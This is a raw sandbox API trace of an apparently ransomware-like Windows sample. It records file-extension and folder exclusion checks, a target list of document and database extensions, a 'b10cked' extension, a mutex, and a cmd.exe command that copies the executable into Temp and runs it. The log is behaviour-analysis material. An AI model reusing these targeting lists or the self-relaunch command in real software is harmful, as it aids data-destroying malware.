dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", 
cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0093.988] 
LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0093.988] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0093.988] LockResource (hResData=0x516f58) returned 0x516f58 [0093.988] FreeResource (hResData=0x516f58) returned 0 [0093.988] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.988] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.988] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.988] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.988] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361d70, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.988] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361d70, cbMultiByte=38, lpWideCharStr=0x133de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.988] FreeResource (hResData=0x50d64c) returned 0 [0093.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361d74, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] GetCurrentThreadId () returned 0xaf0 [0093.988] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12face8, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0093.988] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12face8, cbMultiByte=97, lpWideCharStr=0x12b81ec, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0093.988] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0093.988] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0093.988] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0093.989] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0093.989] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0093.989] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0093.989] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.989] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.989] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.989] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.989] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="24MainProcessMutex5") returned 0x0 [0093.989] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="24MainProcessMutex5") returned 0xb8 [0093.989] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\*.ast", lpFindFileData=0x12f9fc | out: lpFindFileData=0x12f9fc) returned 0xffffffff [0093.989] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0093.989] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\7l6OWDI9Fmrsoy1O.ast" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\7l6owdi9fmrsoy1o.ast"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x40000080, hTemplateFile=0x0) returned 0xbc [0093.989] GetTickCount () returned 0x22caa [0093.990] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc1c | out: lpPerformanceCount=0x12fc1c*=15077875226) returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="y\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="A\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="Q\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="b\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="5\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="Z\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, 
cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="g\x12ﰘ\x12\x01") returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="8\x12ﰘ\x12\x01") returned 1 [0093.990] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1299c7c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0093.990] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0093.990] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0093.990] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x1299c7c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0093.990] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0093.990] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0093.990] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\YAQB5ZG8.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\YAQB5ZG8.EXE\" [PARAMS]") returned 0xb1 [0093.990] 
CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0093.990] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb38*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb28 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessInformation=0x12fb28*(hProcess=0xc4, hThread=0xc0, dwProcessId=0xb0c, dwThreadId=0xb10)) returned 1 [0094.000] CloseHandle (hObject=0xc4) returned 1 [0094.000] CloseHandle (hObject=0xc0) returned 1 [0094.000] Sleep (dwMilliseconds=0xfa) [0094.327] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", 
cchWideChar=24, lpMultiByteStr=0x132f63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0094.327] GetProcAddress (hModule=0x76910000, lpProcName="CreateToolhelp32Snapshot") returned 0x7694f731 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x1312d4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0094.327] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListFirst") returned 0x769a02e7 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0094.327] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListNext") returned 0x769a0391 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x1312d4c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Heap32First") returned 0x769a0429 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x1312d4c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Heap32Next") returned 0x769a0614 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x132f63c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x769a0819 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0094.328] GetProcAddress (hModule=0x76910000, 
